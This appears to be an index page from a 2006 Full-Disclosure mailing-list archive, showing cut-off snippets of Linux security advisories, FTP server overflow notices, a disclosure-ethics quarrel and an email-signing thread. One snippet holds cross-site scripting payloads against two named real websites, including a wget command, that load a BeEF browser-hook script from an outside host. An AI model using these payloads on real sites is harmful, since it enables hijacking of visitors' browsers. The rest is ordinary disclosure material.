On 11/7/06, M. B. Jr. <[EMAIL PROTECTED]> wrote:
> Hello gentlemen, I'm new to the list.
> Hope I can contribute and learn.
>
> Just want to share this thing I'm studying right now.
> It promises to be an interesting initiative from veteran
> researcher HD
This is actually a project by LMH, alt
DMA[2006-1107a] - 'OpenBase SQL multiple vulnerabilities Part Deux'
Author: Kevin Finisterre
Vendor(s): http://www.openbase.com
Product: 'OpenBase SQL <=10.0 (?)'
References:
http://www.digitalmunition.com/DMA[2006-1107a].txt
Description:
(regurgitation warning - this may taste VERY familiar)
Hello gentlemen, I'm new to the list.
Hope I can contribute and learn.
Just want to share this thing I'm studying right now.
It promises to be an interesting initiative from veteran researcher HD Moore, founder of Metasploit.
http://projects.info-pull.com/mokb/
Sort of didactic also.
// best reg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:198-1
http://www.mandriva.com/security/
___
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:202
http://www.mandriva.com/security/
___
And did you email the vendor first?
mailto:[EMAIL PROTECTED]
It's listed on his page you know... and have you given them a chance to
fix it or are you "too lazy" to give a vendor a chance to fix things
first before you full-disclosure them?
There are some vendors that yeah.. it's hard to argue
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:201
http://www.mandriva.com/security/
___
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200611-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:200
http://www.mandriva.com/security/
___
Right. I'm aware of that. I get spam post-dated all the time (so it
will go the end of the list when sorted by date). I was more thinking
that the mail drive program would get the system time from the OS before
processing new unsigned mail.
Matthew Flaschen
Darkz wrote:
> Matthew Flaschen wrot
http://www.ratp.info/Pivi/index.php?aar=bar%3C/textarea%3E%3Cscript+src=http://dcBeef.net/hook/beefmagic.js.php%3E%3C/script%3E
http://www.ratp.info/Pivi/index.php?adp=bar%3C/textarea%3E%3Cscript+src=http://dcBeef.net/hook/beefmagic.js.php%3E%3C/script%3E
--Xor4Life Team--
* By the referrer:
wget --no-cache
--referer="%22%3E%3Cscript%0Asrc%3Dhttp%3A%2F%2FdcBeef.net%2Fhook%2Fbeefmagic.js.php%3E%3C%2Fscript%3E%3Ca%0Aname%3D%22"
"http://www.laredoute.fr/product.aspx?ProductID=324106955&DocumentID=222306";
* By the URL:
http://www.laredoute.fr/category
Hi K F,
No, I also thought the same but not. Internally (when
looking into it with a debugger) the "%s" characters
are expanded to something. If you tries the same
exploit changing "%s" with, i.e., "%x" it doesn't
work.
I tried with various other combinations and,
strangely, it only works with t
Hi,
Anyone got a security contact for GoAhead Embedded Web Server?
Thanks
Gary
Sec-1 specialises in the provision of network security solutions. For more
information on products and services we offer visit www.sec-1.com or call 0113
257 8955.
___
Fu
we are going to tell your professor that you are cheating!!
-JP
On 11/6/06, kijs kijs <[EMAIL PROTECTED]> wrote:
> hi all
> Last week,I'm looking for indexing infornation for Forensics. Is not
> understood very much regarding some questions:
>
> Questions 1:
> | Pr [ x(i1) x(i2)...x(ik) = a ] - 2
WFTPD Pro Server 3.23 Buffer Overflow
-
A buffer overflow was found in the APPE command when
passing (as first) a long string
with slashes and/or backslashes. The exploit is
clearly exploitable as overwritting EIP
is quite easy but I'm too lazy...
Attached goes
WarFTPd 1.82.00-RC11 Remote Denial Of Service
-
WarFTPd is vulnerable to a DOS condition when passing
to various commands a long string with
two times the "%s" character(s) inside. It looks as
non exploitable as the problem crashes with
the same output
WFTPD Pro Server 3.23 Buffer Overflow
-
A buffer overflow was found in the APPE command when
passing (as first) a long string
with slashes and/or backslashes. The exploit is
clearly exploitable as overwritting EIP
is quite easy but I'm too lazy...
Attached goes
it's a joke about of IE7..
- Original Message -
From: "Tyop?" <[EMAIL PROTECTED]>
To:
Sent: Tuesday, November 07, 2006 8:46 AM
Subject: Re: [Full-disclosure] Microsoft Firefox?
> On 11/7/06, Zachary Miller <[EMAIL PROTECTED]> wrote:
>> On Nov 6, 2006, at 1:34 PM, imipak wrote:
>> > Simo
Matthew Flaschen wrote:
Just set it to only accept signed messages starting from a certain date.
Matthew Flaschen
Darkz wrote:
Matthew Flaschen wrote:
Why can't message signing offer backwards compatibility (assuming you
use multipart/signed)?
Matthew Flaschen
D
20 matches
Mail list logo